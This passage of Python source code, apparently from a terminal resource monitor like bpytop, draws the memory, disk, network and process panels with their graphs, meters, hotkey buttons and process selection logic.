if cls.mem_meter < 1: cls.mem_meter = 0
if CONFIG.mem_graphs:
cls.graph_height = round(((cls.height - (2 if cls.swap_on and not CONFIG.swap_disk else 1)) - (2 if cls.mem_size == 3 else 1) * item_height) / item_height)
if cls.graph_height == 0: cls.graph_height = 1
if cls.graph_height > 1: cls.mem_meter += 6
else:
cls.graph_height = 0
if CONFIG.show_disks:
cls.disk_meter = cls.width - cls.mem_width - 23
if cls.disks_width < 25:
cls.disk_meter += 10
if cls.disk_meter < 1: cls.disk_meter = 0
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
out: str = ""
out += f'{create_box(box=cls, line_color=THEME.mem_box)}'
if CONFIG.show_disks:
out += (f'{Mv.to(cls.y, cls.divider + 2)}{THEME.mem_box(Symbol.title_left)}{Fx.b}{THEME.title("disks")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}'
f'{Mv.to(cls.y, cls.divider)}{THEME.mem_box(Symbol.div_up)}'
f'{Mv.to(cls.y + cls.height - 1, cls.divider)}{THEME.mem_box(Symbol.div_down)}{THEME.div_line}'
f'{"".join(f"{Mv.to(cls.y + i, cls.divider)}{Symbol.v_line}" for i in range(1, cls.height - 1))}')
return out
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
mem = MemCollector
if mem.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
gbg: str = ""
gmv: str = ""
gli: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
if cls.resized or cls.redraw:
cls._calc_size()
out_misc += cls._draw_bg()
Meters.mem = {}
Meters.swap = {}
Meters.disks_used = {}
Meters.disks_free = {}
if cls.mem_meter > 0:
for name in cls.mem_names:
if CONFIG.mem_graphs:
Meters.mem[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.vlist[name])
else:
Meters.mem[name] = Meter(mem.percent[name], cls.mem_meter, name)
if cls.swap_on:
for name in cls.swap_names:
if CONFIG.mem_graphs and not CONFIG.swap_disk:
Meters.swap[name] = Graph(cls.mem_meter, cls.graph_height, THEME.gradient[name], mem.swap_vlist[name])
elif CONFIG.swap_disk and CONFIG.show_disks:
Meters.disks_used["__swap"] = Meter(mem.swap_percent["used"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free["__swap"] = Meter(mem.swap_percent["free"], cls.disk_meter, "free")
break
else:
Meters.swap[name] = Meter(mem.swap_percent[name], cls.mem_meter, name)
if cls.disk_meter > 0:
for n, name in enumerate(mem.disks.keys()):
if n * 2 > h: break
Meters.disks_used[name] = Meter(mem.disks[name]["used_percent"], cls.disk_meter, "used")
if len(mem.disks) * 3 <= h + 1:
Meters.disks_free[name] = Meter(mem.disks[name]["free_percent"], cls.disk_meter, "free")
if not "g" in Key.mouse:
Key.mouse["g"] = [[x + cls.mem_width - 8 + i, y-1] for i in range(5)]
out_misc += (f'{Mv.to(y-1, x + cls.mem_width - 9)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.mem_graphs else ""}'
f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 2: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
out += f'{Meters.disks_used[name]}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 2
if len(mem.disks) * 3 <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name]}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
height_p = 30
width_p = 45
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int
if cls.stat_mode:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
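#* The download graph fills the upper half of the box and the upload graph (inverted) the lower half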
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
height_p = 68
width_p = 55
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.proc_mode:
width_p, height_p = 100, 80
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if cls.stat_mode: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
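#* start is the first visible process in the list and selected the highlighted row within the current page (0 means no selection)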
if key == "up":
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key == "down":
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if cls.stat_mode: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles are only redrawn when needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details["killed"]
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+5 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+11 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
